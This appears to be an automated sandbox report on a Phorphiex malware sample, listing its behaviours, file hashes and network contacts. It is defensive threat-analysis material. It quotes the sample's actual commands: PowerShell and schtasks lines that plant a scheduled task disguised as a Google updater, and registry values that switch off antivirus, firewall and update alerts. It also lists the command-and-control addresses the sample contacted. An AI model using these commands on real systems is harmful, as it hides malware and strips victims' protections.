Analysis Overview
SHA256
22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
Threat Level: Known bad
The file tmp was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
Phorphiex
Windows security bypass
Executes dropped EXE
Downloads MZ/PE file
Loads dropped DLL
Windows security modification
Checks computer location settings
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-28 09:38
Signatures
Phorphiex family
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-28 09:38
Reported
2022-09-28 09:41
Platform
win7-20220901-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\267013931.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1176812100.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\734023711.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\267013931.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysrdsvms.exe" | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File created | C:\Windows\sysrdsvms.exe | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
| File opened for modification | C:\Windows\sysrdsvms.exe | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\267013931.exe
C:\Users\Admin\AppData\Local\Temp\267013931.exe
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
C:\Windows\sysrdsvms.exe
C:\Windows\sysrdsvms.exe
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
C:\Users\Admin\AppData\Local\Temp\394619085.exe
C:\Users\Admin\AppData\Local\Temp\394619085.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Users\Admin\AppData\Local\Temp\734023711.exe
C:\Users\Admin\AppData\Local\Temp\734023711.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Windows\system32\taskeng.exe
taskeng.exe {4FCE7D72-71EF-4E8D-933B-3745F908F74E} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 94.141.68.136:40500 | N/A | udp |
| IR | 2.184.54.70:40500 | N/A | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IN | 14.139.242.251:40500 | N/A | udp |
| HK | 74.119.193.54:40500 | N/A | udp |
| IR | 188.211.85.37:40500 | N/A | udp |
| IR | 89.219.213.197:40500 | N/A | udp |
| IR | 80.210.24.47:40500 | N/A | udp |
| UZ | 185.4.160.252:40500 | N/A | tcp |
| YE | 5.255.14.166:40500 | N/A | udp |
| AM | 94.228.28.169:40500 | N/A | udp |
| KZ | 88.204.242.226:40500 | N/A | udp |
| KZ | 92.47.122.155:40500 | N/A | udp |
| UZ | 213.230.127.60:40500 | N/A | udp |
| IR | 2.185.153.12:40500 | N/A | tcp |
| IR | 151.242.43.249:40500 | N/A | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 2.180.243.38:40500 | N/A | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 87.237.234.222:40500 | N/A | udp |
| IN | 117.247.17.27:40500 | N/A | tcp |
| RU | 109.191.166.61:40500 | N/A | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| N/A | 100.115.152.96:40500 | N/A | udp |
Files
memory/1760-54-0x0000000074DA1000-0x0000000074DA3000-memory.dmp
memory/1220-55-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
memory/1344-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1344-63-0x000000013F920000-0x000000013F926000-memory.dmp
memory/1344-64-0x000007FEFB651000-0x000007FEFB653000-memory.dmp
memory/1912-65-0x0000000000000000-mapping.dmp
memory/1052-66-0x0000000000000000-mapping.dmp
memory/968-68-0x0000000000000000-mapping.dmp
memory/1532-67-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\267013931.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/2024-70-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\267013931.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
memory/1228-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
memory/944-79-0x0000000000000000-mapping.dmp
C:\Windows\sysrdsvms.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\1[1]
| MD5 | 1f1b20c870a2dc3f79ee75bbedf9d04b |
| SHA1 | a1035a7cda7175e3860d68c6419961ac019a1853 |
| SHA256 | 8f7fce104fa87321cd25d98bd3b26579eedd314487369d7e18a9009f5fb7b5a6 |
| SHA512 | 81c74e8a27980b0460bc15f6745d5a4d4ff9c310bfd32c6e59e7acfc098ddbf06a399e3e6eebd77c3f9953fbe7cda92df63668d3e374329c5a5379eeea9fc51e |
\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/2032-85-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\394619085.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
